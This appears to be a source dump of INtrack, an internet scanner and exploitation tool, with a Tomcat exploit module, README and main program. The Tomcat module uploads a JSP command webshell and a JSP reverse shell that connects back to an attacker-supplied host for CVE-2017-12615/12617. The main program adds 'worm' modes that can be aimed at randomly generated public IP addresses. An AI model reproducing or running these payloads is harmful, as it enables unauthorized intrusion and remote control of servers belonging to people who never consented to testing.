  4 | from intrack.lib.headers.headers_handler import user_agents
  5 | from intrack.lib.color_handler import print_colour
  6 | 
  7 | headers = {
  8 |     'User-Agent': user_agents()
  9 | }
 10 | 
 11 | def generate_string(length=8):
 12 |     return ''.join(random.choices(string.ascii_lowercase + string.digits, k=length))
 13 | 
 14 | def check_tomcat(ip, ports=False):
 15 |     tomcat_paths = [
 16 |         "",
 17 |         "/",
 18 |         f"/{generate_string()}",
 19 |         "/docs/introduction.html"
 20 |     ]
 21 | 
 22 |     protocols = ["http", "https"]
 23 | 
 24 |     if ports is None:
 25 |         ports = [80]
 26 |     else:
 27 |         ports = [f":{port}" for port in ports]
 28 | 
 29 |     for protocol in protocols:
 30 |         for port in ports:
 31 |             for path in tomcat_paths:
 32 |                 url = f"{protocol}://{ip}{port}{path}"
 33 |                 try:
 34 |                     response = requests.get(url, headers=headers, timeout=5, verify=False)
 35 |                     if any(
 36 |                         keyword in response.headers.get('Server', '').lower()
 37 |                         for keyword in ['tomcat']
 38 |                     ) or any(
 39 |                         keyword in response.text.lower()
 40 |                         for keyword in ['apache tomcat', '/manager/html', '/manager/status']
 41 |                     ):
 42 |                         print_colour(f"Tomcat detected at {url}")
 43 |                         return True
 44 |                 except requests.RequestException:
 45 |                     continue
 46 |     return False
 47 | 
 48 | def upload_primary_payload(main_url):
 49 |     print_colour("Attempting primary JSP payload upload (webshell)")
 50 |     primary_jsp_payload = '''
 51 |     <%@ page import="java.util.*,java.io.*"%>
 52 |     <%
 53 |     if (request.getParameter("cmd") != null) {
 54 |         out.println("Command: " + request.getParameter("cmd") + "<BR>");
 55 |         Process p = Runtime.getRuntime().exec(request.getParameter("cmd"));
 56 |         InputStream in = p.getInputStream();
 57 |         DataInputStream dis = new DataInputStream(in);
 58 |         String line;
 59 |         while ((line = dis.readLine()) != null) {
 60 |             out.println(line);
 61 |         }
 62 |     }
 63 |     %>
 64 |     '''
 65 | 
 66 |     upload_url = f"{main_url}/{generate_string()}.jsp"
 67 |     headers = {"Content-Type": "application/x-www-form-urlencoded"}
 68 |     try:
 69 |         response = requests.put(upload_url, data=primary_jsp_payload, headers=headers, timeout=10, verify=False)
 70 |         if response.status_code == 201:
 71 |             print_colour(f"Primary JSP shell uploaded at {upload_url}")
 72 |             return upload_url
 73 |         else:
 74 |             print_colour(f"Failed to upload primary JSP shell (status code: {response.status_code})")
 75 |     except requests.RequestException:
 76 |         print_red(f"Error during primary JSP upload")
 77 |     return None
 78 | 
 79 | def upload_secondary_payload(main_url, lhost, lport):
 80 |     print_colour("Attempting secondary JSP payload upload (revshell)")
 81 |     secondary_jsp_payload = '''
 82 |     <%@ page import="java.util.*,java.io.*,java.net.*"%>
 83 |     <%
 84 |     class StreamConnector extends Thread {
 85 |         InputStream is;
 86 |         OutputStream os;
 87 |         StreamConnector(InputStream is, OutputStream os) {
 88 |             this.is = is;
 89 |             this.os = os;
 90 |         }
 91 |         public void run() {
 92 |             BufferedReader reader = null;
 93 |             BufferedWriter writer = null;
 94 |             try {
 95 |                 reader = new BufferedReader(new InputStreamReader(this.is));
 96 |                 writer = new BufferedWriter(new OutputStreamWriter(this.os));
 97 |                 char[] buffer = new char[8192];
 98 |                 int length;
 99 |                 while ((length = reader.read(buffer, 0, buffer.length)) > 0) {
100 |                     writer.write(buffer, 0, length);
101 |                     writer.flush();
102 |                 }
103 |             } catch (Exception e) {
104 |                 // Handle exception
105 |             } finally {
106 |                 try {
107 |                     if (reader != null) reader.close();
108 |                     if (writer != null) writer.close();
109 |                 } catch (Exception e) {
110 |                     // Handle exception
111 |                 }
112 |             }
113 |         }
114 |     }
115 | 
116 |     try {
117 |         String shell = "/bin/sh";
118 |         if (System.getProperty("os.name").toLowerCase().contains("windows")) {
119 |             shell = "cmd.exe";
120 |         }
121 |         Socket socket = new Socket("{lhost}", {lport});
122 |         Process process = Runtime.getRuntime().exec(shell);
123 |         new StreamConnector(process.getInputStream(), socket.getOutputStream()).start();
124 |         new StreamConnector(socket.getInputStream(), process.getOutputStream()).start();
125 |     } catch (Exception e) {
126 |         // Handle exception
127 |     }
128 |     %>
129 |     '''.replace("{lhost}", lhost).replace("{lport}", str(lport))
130 | 
131 |     upload_url = f"{main_url}/{generate_string()}.jsp"
132 |     try:
133 |         response = requests.put(upload_url, data=secondary_jsp_payload, headers=headers, timeout=10, verify=False)
134 |         if response.status_code == 201:
135 |             print_colour(f"Secondary JSP shell uploaded at {upload_url}?cmd=")
136 |             return upload_url
137 |         else:
138 |             print_colour(f"Failed to upload secondary JSP shell (status code: {response.status_code})")
139 |     except requests.RequestException:
140 |         print_colour(f"Error during secondary JSP upload")
141 | 
142 |     return None
143 | 
144 | def exploit_CVE_2017_12615_CVE_2017_12617(ip, lhost=None, lport=None, port=None):
145 |     if check_tomcat(ip, [port]):
146 |         print_colour("Attempting CVE-2017-12615 & CVE-2017-12617 exploitation (JSP upload)")
147 |         main_url = f"http://{ip}:{port}" if port else f"http://{ip}"
148 |         upload_primary_payload(main_url)
149 |         if lhost and lport:
150 |             upload_secondary_payload(main_url, lhost, lport)
151 |         else:
152 |             print_colour("Skipping secondary payload upload due to missing lhost or lport.")


--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
  1 | # INtrack - Internet Crawler & Security Scanner
  2 | 
  3 | <p align="center">
  4 |   <img src="docs/logo.png" alt="INtrack Logo" width="250"/>
  5 | </p>
  6 | 
  7 | INtrack is a powerful, multi-threaded security scanner and internet crawler designed for network reconnaissance, vulnerability detection, and security assessment. It can scan for a wide variety of instances, vulnerabilities, IoT devices, exposures, and more.
  8 | 
  9 | ## Features
 10 | 
 11 | - 🔍 **Comprehensive Scanning**: Detect web servers, applications, vulnerable services, and more
 12 | - 🌐 **Flexible Target Selection**: Scan single hosts, subnets, random internet IPs, or targets from a file
 13 | - 🛠️ **Multiple Scanner Types**:
 14 |   - Vulnerability scanners for known CVEs
 15 |   - Instance detection (WordPress, Jira, Apache, Nginx, etc.)
 16 |   - IoT device detection
 17 |   - Backdoor implant detection
 18 |   - Network service identification
 19 |   - Exposure scanners (robots.txt, security.txt, etc.)
 20 | - 🔄 **Multi-threaded**: Fast, concurrent scanning with customizable thread count
 21 | - 🔧 **Customizable**: Configure ports, timeouts, and scan types
 22 | - 📊 **Progress Visualization**: Real-time scanning progress with alive-progress bar
 23 | 
 24 | ## Installation
 25 | 
 26 | ```bash
 27 | # Install pipx if not already installed:
 28 | python3 -m pip install --user pipx
 29 | python3 -m pipx ensurepath
 30 | 
 31 | # Install INtrack via pipx directly from GitHub:
 32 | pipx install git+https://github.com/K3ysTr0K3R/INtrack.git
 33 | ```
 34 | 
 35 | ## Usage
 36 | 
 37 | ### Basic Usage
 38 | 
 39 | ```bash
 40 | intrack -H 192.168.1.1 -p 80,443
 41 | ```
 42 | 
 43 | ### Scan Types
 44 | 
 45 | ```bash
 46 | # Check for WordPress instances
 47 | intrack -H 192.168.1.0/24 --instance wordpress
 48 | 
 49 | # Scan for specific vulnerability
 50 | intrack -H 192.168.1.0/24 --vuln CVE-2017-7921
 51 | 
 52 | # Detect IoT devices
 53 | intrack -H 192.168.1.0/24 --iot hikvision
 54 | 
 55 | # Check for exposed API documentation
 56 | intrack -H 192.168.1.0/24 --exposure api-docs
 57 | 
 58 | # Search for backdoor implants
 59 | intrack -H 192.168.1.0/24 --backdoor antsword
 60 | 
 61 | # Run network checks
 62 | intrack -H 192.168.1.0/24 --network telnet
 63 | ```
 64 | 
 65 | ### Target Selection
 66 | 
 67 | ```bash
 68 | # Scan a single host
 69 | intrack -H 192.168.1.1 --instance wordpress
 70 | 
 71 | # Scan a subnet
 72 | intrack -H 192.168.1.0/24 --instance nginx
 73 | 
 74 | # Scan targets from a file
 75 | intrack -f targets.txt --instance jira
 76 | 
 77 | # Scan random internet hosts
 78 | intrack -n 100 --instance apache
 79 | ```
 80 | 
 81 | ### Advanced Options
 82 | 
 83 | ```bash
 84 | # Combine multiple scan types
 85 | intrack -H 192.168.1.0/24 --instance "wordpress,jira" --exposure "robots-txt,security-txt"
 86 | 
 87 | # Save results to a file
 88 | intrack -H 192.168.1.0/24 --instance wordpress -o results.txt
 89 | 
 90 | # Resolve hostnames for IPs
 91 | intrack -H 192.168.1.0/24 --hostname --instance wordpress
 92 | 
 93 | # Use more threads for faster scanning
 94 | intrack -H 192.168.1.0/24 -t 50 --instance wordpress
 95 | 
 96 | # Execute worm scripts (requires listener)
 97 | intrack -H 192.168.1.0/24 --worm tomcat -L 192.168.1.100 -P 4444
 98 | 
 99 | # Probe for HTTP/HTTPS services
100 | intrack -H 192.168.1.0/24 --probe -o webservers.txt
101 | ```
102 | 
103 | ### List All Available Scanners
104 | 
105 | ```bash
106 | intrack --list
107 | ```
108 | 
109 | ### Vulnerabilities
110 | - Multiple CVEs (use `--list` to see all)
111 | 
112 | ## Command Line Arguments
113 | 
114 | | Argument           | Description                                                                                 |
115 | |--------------------|---------------------------------------------------------------------------------------------|
116 | | `-H, --host`       | Specify a single target IP or subnet range                                                  |
117 | | `-f, --file`       | Specify a file containing target IPs                                                         |
118 | | `-n, --n-targets`  | Number of random targets to find                                                            |
119 | | `-p, --port`       | Port(s) to check (default: 80)                                                                |
120 | | `-t, --threads`    | Number of threads to use (default: 25)                                                        |
121 | | `-o, --output`     | Store results into a file                                                                   |
122 | | `--lh, --lhost`    | Add a listening host for reverse shells                                                     |
123 | | `--lp, --lport`    | A listening port for reverse shells                                                         |
124 | | `--hostname`       | Resolve hostnames for IP addresses                                                          |
125 | | `--instance`       | Type of instance to check                                                                   |
126 | | `--backdoor`       | Look for backdoor implants                                                                    |
127 | | `--worm`           | Enable special script execution                                                             |
128 | | `--vuln`           | Enable vulnerability script execution                                                       |
129 | | `--exposure`       | Used to detect exposure files                                                               |
130 | | `--iot`            | Used to detect IoT devices                                                                    |
131 | | `--miscellaneous`  | Used for miscellaneous checks                                                               |
132 | | `--workflows`      | Run workflow scans on targets                                                               |
133 | | `-N, --network`    | Used for network scans                                                                      |
134 | | `--timeout`        | Timeout seconds for web requests (default: 10)                                                |
135 | | `--probe`          | Used for probing hosts for HTTP/HTTPS                                                       |
136 | | `-s, --spider`     | Specify subnet range to scan if a result is found                                             |
137 | | `--list`           | List available scanners and checks                                                          |
138 | | `--bar-style`      | Progress bar style (default 'smooth')                                                       |
139 | 
140 | ## Legal Disclaimer
141 | 
142 | This tool is intended for legal security assessments, penetration testing, and educational purposes only. Use responsibly and only against systems you own or have explicit permission to test.
143 | 
144 | ## License
145 | 
146 | [MIT License](LICENSE)
147 | 
148 | ## Contributing
149 | 
150 | Contributions are welcome! Please follow the standard contribution guidelines for submitting issues or pull requests.
151 | 
152 | ---
153 | 
154 | **Stay tuned for updates as we continue to improve INtrack!**


--------------------------------------------------------------------------------
/intrack/main.py:
--------------------------------------------------------------------------------
  1 | #!/usr/bin/env python3
  2 | 
  3 | import os
  4 | import sys
  5 | import random
  6 | import socket
  7 | import urllib3
  8 | import threading
  9 | import concurrent.futures
 10 | import rich_click as click
 11 | 
 12 | from bisect import bisect
 13 | from itertools import accumulate
 14 | from rich.console import Console
 15 | from alive_progress import alive_bar, config_handler
 16 | 
 17 | from intrack.lib.worms import *
 18 | from intrack.lib.backdoors import *
 19 | from intrack.lib.exposures import *
 20 | from intrack.lib.miscellaneous import *
 21 | from intrack.lib.iot import *
 22 | from intrack.lib.instances import *
 23 | from intrack.lib.network import *
 24 | from intrack.lib.vulns import *
 25 | from intrack.lib.workflows import *
 26 | from intrack.lib.color_handler import print_colour
 27 | from intrack.lib.hostname_handler import get_hostname
 28 | from intrack.lib.http_handler import http_https
 29 | 
 30 | console = Console()
 31 | 
 32 | urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
 33 | 
 34 | 
 35 | def print_red(message):
 36 |     """Print a message in red color for errors"""
 37 |     print_colour(f"[-] {message}")
 38 | 
 39 | def ascii_art():
 40 |     print("")
 41 |     console.print("[bold bright_yellow]██╗███╗   ██╗████████╗██████╗  █████╗  ██████╗██╗  ██╗[/bold bright_yellow]")
 42 |     console.print("[bold bright_yellow]██║████╗  ██║╚══██╔══╝██╔══██╗██╔══██╗██╔════╝██║ ██╔╝[/bold bright_yellow]")
 43 |     console.print("[bold bright_yellow]██║██╔██╗ ██║   ██║   ██████╔╝███████║██║     █████╔╝[/bold bright_yellow]")
 44 |     console.print("[bold bright_yellow]██║██║╚██╗██║   ██║   ██╔══██╗██╔══██║██║     ██╔═██╗[/bold bright_yellow]")
 45 |     console.print("[bold bright_yellow]██║██║ ╚████║   ██║   ██║  ██║██║  ██║╚██████╗██║  ██╗[/bold bright_yellow]")
 46 |     console.print("[bold bright_yellow]╚═╝╚═╝  ╚═══╝   ╚═╝   ╚═╝  ╚═╝╚═╝  ╚═╝ ╚═════╝╚═╝  ╚═╝[/bold bright_yellow]") 
 47 |     print("")
 48 |     print_colour("[!] Coded By: K3ysTr0K3R")
 49 | 
 50 | def is_reserved_ip(ip):
 51 |     """Check if an IP address is in a reserved range"""
 52 |     # Convert IP string to integer for easier comparison
 53 |     octets = list(map(int, ip.split('.')))
 54 |     ip_int = (octets[0] << 24) + (octets[1] << 16) + (octets[2] << 8) + octets[3]
 55 |     
 56 |     # Reserved ranges to skip
 57 |     reserved_ranges = [
 58 |         (0x00000000, 0x00FFFFFF),    # 0.0.0.0/8 - Local Identification
 59 |         (0x0A000000, 0x0AFFFFFF),    # 10.0.0.0/8 - Private Network
 60 |         (0x64400000, 0x647FFFFF),    # 100.64.0.0/10 - Shared Address Space
 61 |         (0x7F000000, 0x7FFFFFFF),    # 127.0.0.0/8 - Loopback
 62 |         (0xA9FE0000, 0xA9FEFFFF),    # 169.254.0.0/16 - Link Local
 63 |         (0xAC100000, 0xAC1FFFFF),    # 172.16.0.0/12 - Private Network
 64 |         (0xC0000000, 0xC00000FF),    # 192.0.0.0/24 - IETF Protocol Assignments
 65 |         (0xC0000200, 0xC00002FF),    # 192.0.2.0/24 - TEST-NET-1
 66 |         (0xC0A80000, 0xC0A8FFFF),    # 192.168.0.0/16 - Private Network
 67 |         (0xC6120000, 0xC613FFFF),    # 198.18.0.0/15 - Network Interconnect
 68 |         (0xC6336400, 0xC63364FF),    # 198.51.100.0/24 - TEST-NET-2
 69 |         (0xCB007100, 0xCB0071FF),    # 203.0.113.0/24 - TEST-NET-3
 70 |         (0xE0000000, 0xEFFFFFFF),    # 224.0.0.0/4 - Multicast
 71 |         (0xF0000000, 0xFFFFFFFF),    # 240.0.0.0/4 - Reserved
 72 |     ]
 73 |     
 74 |     # Check if IP is in any reserved range
 75 |     return any(start <= ip_int <= end for start, end in reserved_ranges)
 76 | 
 77 | def generate_weighted_octet():
 78 |     weights = [(1, 25, 0.2), (25, 100, 0.4), (100, 200, 0.3), (200, 255, 0.1)]
 79 |     cumulative_weights = list(accumulate(weight for _, _, weight in weights))
 80 |     choice = random.random()
 81 |     index = bisect(cumulative_weights, choice)
 82 |     start, end, _ = weights[index] if index < len(weights) else (1, 254, 1.0)
 83 |     return random.randint(start, end)
 84 | 
 85 | def generate_ip():
 86 |     """Generate a random public IP address, avoiding reserved ranges"""
 87 |     max_attempts = 10  # Limit attempts to avoid infinite loops
 88 |     
 89 |     for _ in range(max_attempts):
 90 |         # Generate random IP with weighted distribution
 91 |         ip = f"{generate_weighted_octet()}.{generate_weighted_octet()}.{generate_weighted_octet()}.{generate_weighted_octet()}"
 92 |         
 93 |         if not is_reserved_ip(ip):
 94 |             return ip
 95 |     
 96 |     # Fallback to a common range if we couldn't find a valid IP
 97 |     return f"{random.randint(50, 70)}.{random.randint(30, 150)}.{random.randint(1, 254)}.{random.randint(1, 254)}"
 98 | 
 99 | def check_port(ip, port, timeout=1.0):
100 |     """Check if a port is open with proper timeout handling"""
101 |     with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
102 |         s.settimeout(timeout)
103 |         try:
104 |             s.connect((ip, port))
105 |             return True
106 |         except (socket.timeout, socket.error):
107 |             return False
108 |         except Exception as e:
109 |             print_red(f"Unexpected error checking port {port} on {ip}: {e}")
110 |             return False
111 | 
112 | def parse_ports(port_str):
113 |     """Parse port string inline with error logging, minimal branching, and validation."""
114 |     if not port_str:
115 |         return [80]
116 | 
117 |     ports = set()
118 | 
119 |     [ports.update(range(start, end + 1)) if (start := int(part.split('-')[0])) <= (end := int(part.split('-')[1])) <= 65535 and start >= 1
120 |      else print_red(f"Ignored invalid range: {part}")
121 |      for part in map(str.strip, port_str.split(','))
122 |      if '-' in part and part.count('-') == 1 and all(p.isdigit() for p in part.split('-'))]
123 | 
124 |     [ports.add(port) if 1 <= (port := int(part)) <= 65535
125 |      else print_red(f"Ignored invalid port: {port}")
126 |      for part in map(str.strip, port_str.split(','))
127 |      if '-' not in part and part.isdigit()]
128 | 
129 |     if not ports:
130 |         print_red("No valid ports found, using default port 80")
131 |         return [80]
132 | 
133 |     return sorted(ports)
134 | 
135 | def parse_comma_separated_args(arg_string):
136 |     if not arg_string:
137 |         return []
138 |     return [arg.strip().lower() for arg in arg_string.split(",")]
139 | 
140 | def is_valid_ip(ip):
141 |     """Validate IP address format"""
142 |     try:
143 |         octets = ip.split('.')
144 |         if len(octets) != 4:
145 |             return False
146 |         for octet in octets:
147 |             num = int(octet)
148 |             if num < 0 or num > 255:
149 |                 return False
150 |         return True
151 |     except (ValueError, AttributeError):
152 |         return False
153 | 
154 | def process_ip(ip, kwargs):
155 |     """Process a single IP address with all enabled checks"""
156 |     if not is_valid_ip(ip):
157 |         print_red(f"Invalid IP address format: {ip}")
158 |         return None
159 | 
160 |     ports = parse_ports(kwargs["port"])
161 |     lhost = kwargs["lhost"]
162 |     lport = kwargs["lport"]
163 | 
164 |     if kwargs["hostname"]:
165 |         hostname = get_hostname(ip)
166 |         if hostname and hostname != "None":
167 |             print_colour(f"[+] Hostname resolved: {ip} -> {hostname}")
168 | 
169 |     if kwargs["probe"]:
170 |         probe_result = http_https(ip, kwargs["timeout"])
171 |         if probe_result:
172 |             url = f"{probe_result['protocol']}://{ip}"
173 |             print(url)
174 |             return url
175 |         return None
176 | 
177 |     port_timeout = min(kwargs["timeout"] / 2, 3.0)
178 |     open_ports = [port for port in ports if check_port(ip, port, port_timeout)]
179 |     if not open_ports:
180 |         return None
181 | 
182 |     backdoor_checks = parse_comma_separated_args(kwargs["backdoor"])
183 |     vuln_checks = parse_comma_separated_args(kwargs["vuln"])
184 |     instance_checks = parse_comma_separated_args(kwargs["instance"])
185 |     exposure_checks = parse_comma_separated_args(kwargs["exposure"])
186 |     iot_checks = parse_comma_separated_args(kwargs["iot"])
187 |     misc_checks = parse_comma_separated_args(kwargs["miscellaneous"])
188 |     network_checks = parse_comma_separated_args(kwargs["network"])
189 |     worms = parse_comma_separated_args(kwargs["worm"])
190 | 
191 |     def run_checks(checks, mapping, timeout=True):
192 |         for item in checks:
193 |             for name, func in mapping:
194 |                 if item == name and func(ip, open_ports, kwargs["timeout"] if timeout else None):
195 |                     return ip
196 |         return None
197 | 
198 |     if res := run_checks(backdoor_checks, [
199 |         ("antsword", antsword_backdoor), ("php", php_backdoor), ("mikrotik", mikrotik_backdoor),
200 |         ("dlink", dlink_backdoor), ("cisco", cisco_backdoor), ("webshell", webshell_backdoor)
201 |     ]): return res
202 | 
203 |     if res := run_checks(vuln_checks, [
204 |         ("CVE-2017-7921", check_CVE_2017_7921), ("CVE-2019-17382", check_CVE_2019_17382),
205 |         ("CVE-2018-13379", check_CVE_2018_13379), ("CVE-2022-47945", check_CVE_2022_47945),
206 |         ("CVE-2021-36260", check_CVE_2021_36260), ("CVE-2017-5487", check_CVE_2017_5487),
207 |         ("CVE-2017-7925", check_CVE_2017_7925), ("CVE-2024-0305", check_CVE_2024_0305),
208 |         ("CVE-2016-6277", check_CVE_2016_6277), ("CVE-2019-1653", check_CVE_2019_1653),
209 |         ("CVE-2020-3452", check_CVE_2020_3452), ("CVE-2021-1445", check_CVE_2021_1445),
210 |         ("CVE-2020-3259", check_CVE_2020_3259), ("CVE-2019-2000", check_CVE_2019_2000),
211 |         ("CVE-2022-20842", check_CVE_2022_20842), ("CVE-2022-40684", check_CVE_2022_40684),
212 |         ("CVE-2021-34473", check_CVE_2021_34473), ("CVE-2023-23752", check_CVE_2023_23752),
213 |         ("CVE-2015-1635", check_CVE_2015_1635), ("CVE-2022-1388", check_CVE_2022_1388),
214 |         ("CVE-2021-22986", check_CVE_2021_22986)
215 |     ]): return res
216 | 
217 |     if res := run_checks(instance_checks, [
218 |         ("wordpress", check_wordpress), ("microsoft", check_microsoft_iis), ("server", check_servers),
219 |         ("webmin", scan_webmin), ("thinkphp", check_thinkphp), ("weblogic", check_weblogic),
220 |         ("drupal", check_drupal), ("ncast", check_ncast), ("jira", check_jira),
221 |         ("joomla", check_joomla), ("zimbra", check_zimbra), ("apache", check_apache),
222 |         ("php", php), ("webdav", check_webdav), ("moveit", check_moveit),
223 |         ("nginx", check_nginx), ("bigip", bigip)
224 |     ]): return res
225 | 
226 |     if res := run_checks(exposure_checks, [
227 |         ("robots-txt", check_robots), ("security-txt", check_security), ("sitemap", check_sitemap),
228 |         ("api-docs", check_api_docs), ("security-headers", check_security_headers),
229 |         ("sensitive-endpoints", check_sensitive_endpoints)
230 |     ]): return res
231 | 
232 |     if res := run_checks(iot_checks, [
233 |         ("gargoyle", check_gargoyle), ("gpon", check_gpon), ("webcamxp", check_webcamxp),
234 |         ("netgear", scan_netgear), ("hikvision", check_hikvision), ("cisco", check_cisco),
235 |         ("epmp", check_epmp), ("network-camera", check_network_camera), ("mikrotik", mikrotik_router)
236 |     ]): return res
237 | 
238 |     if res := run_checks(misc_checks, [
239 |         ("dir-listing", check_dir_listing)
240 |     ]): return res
241 | 
242 |     for network in network_checks:
243 |         for name, func in [("telnet", scan_telnet), ("rtsp", rtsp_checks), ("adb-misconfig", check_adb), ("network", port_scanner)]:
244 |             if network == name and func(ip, open_ports):
245 |                 return ip
246 | 
247 |     if worms and lhost and lport:
248 |         for worm in worms:
249 |             for name, func in [
250 |                 ("vscode-sftp", crawl_vscode_sftp), ("microsoft", microsoft_worm),
251 |                 ("tomcat", exploit_CVE_2017_12615_CVE_2017_12617), ("hadoop", hadoop_worm)
252 |             ]:
253 |                 if worm == name:
254 |                     for port in open_ports:
255 |                         func(ip, port, lhost, lport)
256 |                     return ip
257 |     elif worms:
258 |         print_red("Error: Both -lh (lhost) and -lp (lport) must be provided with -worm.")
259 |         sys.exit(1)
260 | 
261 |     if open_ports and not any([kwargs["instance"], kwargs["vuln"], kwargs["exposure"], kwargs["iot"], kwargs["miscellaneous"], worms]):
262 |         return ip
263 | 
264 |     return None
265 | 
266 | def safe_open_file(filename, mode):
267 |     """Safely open a file with path traversal protection."""
268 |     safe_path = os.path.normpath(filename)
269 | 
270 |     # Check for suspicious patterns like '..' or starting from root
271 |     if '..' in safe_path or safe_path.startswith(os.sep):
272 |         print_red(f"Suspicious file path detected: {filename}")
273 |         return None
274 | 
275 |     try:
276 |         return open(safe_path, mode)
277 |     except (FileNotFoundError, PermissionError) as e:
278 |         print_red(f"{e.strerror}: {safe_path}")
279 |     except Exception as e:
280 |         print_red(f"Error opening file {safe_path}: {e}")
281 |     return None
282 | 
283 | def read_targets_from_file(filename):
284 |     """Read targets from file with validation and better error handling"""
285 |     # Use safe file opening
286 |     f = safe_open_file(filename, 'r')
287 |     if not f:
288 |         print_red(f"Could not open file: {filename}")
289 |         sys.exit(1)
290 |     
291 |     ips = []
292 | 
293 |     def process_line(line, line_number):
294 |         target = line.strip()
295 | 
296 |         # Skip empty lines and comments
297 |         if not target or target.startswith('#'):
298 |             return
299 | 
300 |         # Process subnet
301 |         if '/' in target:
302 |             try:
303 |                 subnet_ips = get_ips_from_subnet(target)
304 |                 ips.extend(subnet_ips)
305 |             except Exception as e:
306 |                 print_red(f"Error parsing subnet {target} on line {line_number}: {e}")
307 |             return
308 | 
309 |         # Process single IP
310 |         if is_valid_ip(target):
311 |             ips.append(target)
312 |             return
313 | 
314 |         # Invalid IP format
315 |         print_red(f"Invalid IP format on line {line_number}: {target}")
316 | 
317 |     try:
318 |         for line_number, line in enumerate(f, 1):  # Start line number at 1
319 |             process_line(line, line_number)
320 |     finally:
321 |         f.close()
322 | 
323 |     # Ensure there are valid IPs
324 |     if not ips:
325 |         print_red(f"No valid IPs found in file '{filename}'.")
326 |         sys.exit(1)
327 | 
328 |     return ips
329 | 
330 | def list_scanners():
331 |     print_colour("[+] Available Scanners:\n")
332 | 
333 |     print()
334 |     print_colour("[*] Worms:")
335 |     for worm in ["vscode-sftp", "microsoft", "tomcat", "hadoop"]:
336 |         print_colour(f"[!] - {worm}")
337 | 
338 |     print()
339 |     print_colour("[*] Backdoors:")
340 |     for backdoor in ["antsword"]:
341 |         print_colour(f"[!] - {backdoor}")
342 | 
343 |     print()
344 |     print_colour("[*] Exposures:")
345 |     for exposure in ["robots-txt", "security-txt", "sitemap"]:
346 |         print_colour(f"[!] - {exposure}")
347 | 
348 |     print()
349 |     print_colour("[*] Instances:")
350 |     for instance in [
351 |         "wordpress", "microsoft", "server", "webmin", "thinkphp",
352 |         "weblogic", "drupal", "ncast", "jira", "joomla", "zimbra",
353 |         "apache", "php", "webdav", "moveit", "nginx", "bigip"
354 |     ]:
355 |         print_colour(f"[!] - {instance}")
356 | 
357 |     print()
358 |     print_colour("[*] Network Checks:")
359 |     for network in ["telnet", "rdp", "rtsp", "adb-misconfig", "port-scanner"]:
360 |         print_colour(f"[!] - {network}")
361 | 
362 |     print()
363 |     print_colour("[*] IoT Checks:")
364 |     for iot in [
365 |         "gargoyle", "gpon", "webcamxp", "netgear", "hikvision",
366 |         "cisco", "epmp", "network-camera", "routeros"
367 |     ]:
368 |         print_colour(f"[!] - {iot}")
369 | 
370 |     print()
371 |     print_colour("[*] Miscellaneous Checks:")
372 |     for misc in ["dir-listing"]:
373 |         print_colour(f"[!] - {misc}")
374 | 
375 |     print()
376 |     print_colour("[*] Vulnerabilities:")
377 |     for vuln in [
378 |         "CVE-2016-6277", "CVE-2024-0305", "CVE-2018-13379", "CVE-2017-7921",
379 |         "CVE-2019-17382", "CVE-2019-1653", "CVE-2022-47945", "CVE-2021-36260",
380 |         "CVE-2017-5487", "CVE-2017-7925", "CVE-2022-40684", "CVE-2021-34473",
381 |         "CVE-2023-23752", "CVE-2015-1635", "CVE-2022-1388", "CVE-2021-22986",
382 |         "traversal"
383 |     ]:
384 |         print_colour(f"[!] - {vuln}")
385 | 
386 |     print()
387 |     print_colour("[*] Workflow Scans:")
388 |     for wf in ["microsoft"]:
389 |         print_colour(f"[!] - {wf}")
390 | 
391 | 
392 | def print_scan_context(kwargs):
393 |     if kwargs['output_file']:
394 |         print_colour(f"[*] Results will be saved to: {kwargs['output_file']}")
395 | 
396 |     print_colour(f"[*] Using {kwargs['threads']} threads with {kwargs['timeout']}s timeout")
397 |     print_colour("----------------------------------------")
398 | 
399 |     active_scans = []
400 |     for key in ["backdoor", "vuln", "instance", "exposure", "iot", "miscellaneous", "network", "worm"]:
401 |         if kwargs[key]:
402 |             active_scans.append(f"{key.capitalize()} checks: {kwargs[key]}")
403 | 
404 |     if active_scans:
405 |         print_colour("[*] Active scan modules:")
406 |         for scan in active_scans:
407 |             print_colour(f"    - {scan}")
408 |     else:
409 |         print_colour("[*] No specific scan modules activated - checking open ports only")
410 | 
411 | def open_output_file(path):
412 |     if path:
413 |         output = safe_open_file(path, 'a')
414 |         if not output:
415 |             print_red(f"Unable to open output file '{path}'. Results will only be shown on screen.")
416 |         return output
417 |     return None
418 | 
419 | def handle_random_scan(n_targets, kwargs, output_file):
420 |     total_checked = 0
421 |     found_count = 0
422 |     counter_lock = threading.Lock()
423 |     found_targets = []
424 |     total_to_scan = n_targets * 20
425 | 
426 |     def generate_ip_batch(batch_size):
427 |         for _ in range(batch_size):
428 |             yield generate_ip()
429 | 
430 |     def process_and_update(ip):
431 |         nonlocal total_checked, found_count
432 |         result = process_ip(ip, kwargs)
433 |         with counter_lock:
434 |             total_checked += 1
435 |             progress_bar.title(f"Scanning Internet [{total_checked}/{total_to_scan}] - Found {found_count}/{n_targets}")
436 |             progress_bar()
437 |             if result:
438 |                 found_targets.append(result)
439 |                 found_count += 1
440 |                 if output_file:
441 |                     output_file.write(f"{result}\n")
442 |                     output_file.flush()
443 |         return result
444 | 
445 |     with alive_bar(total_to_scan, title="Scanning Internet", enrich_print=False, bar=kwargs['bar_style'], stats=True, unit=" IPs") as progress_bar:
446 |         while found_count < n_targets:
447 |             ip_batch = generate_ip_batch(kwargs['threads'] * 10)
448 |             with concurrent.futures.ThreadPoolExecutor(max_workers=kwargs['threads']) as executor:
449 |                 list(executor.map(process_and_update, ip_batch))
450 | 
451 |             if found_count >= n_targets:
452 |                 break
453 |             if total_checked >= total_to_scan:
454 |                 old_total = total_to_scan
455 |                 total_to_scan = int(total_to_scan * 1.5)
456 |                 progress_bar.total = total_to_scan
457 |                 print_colour(f"[*] Increasing scan estimate: {old_total} -> {total_to_scan}")
458 | 
459 |     print()
460 |     print_colour(f"[+] Scan complete - Found {found_count}/{n_targets} targets (Checked {total_checked} IPs)")
461 |     return found_targets
462 | 
463 | def handle_known_ips(ip_addresses, kwargs, output_file):
464 |     total_ips = len(ip_addresses)
465 |     found_count = 0
466 |     ips_processed = 0
467 |     counter_lock = threading.Lock()
468 |     found_targets = []
469 | 
470 |     def process_and_update(ip):
471 |         nonlocal ips_processed, found_count
472 |         result = process_ip(ip, kwargs)
473 |         with counter_lock:
474 |             ips_processed += 1
475 |             progress_bar.title(f"Scanning IPs [{ips_processed}/{total_ips}] - Found {found_count}")
476 |             progress_bar()
477 |             if result:
478 |                 found_targets.append(result)
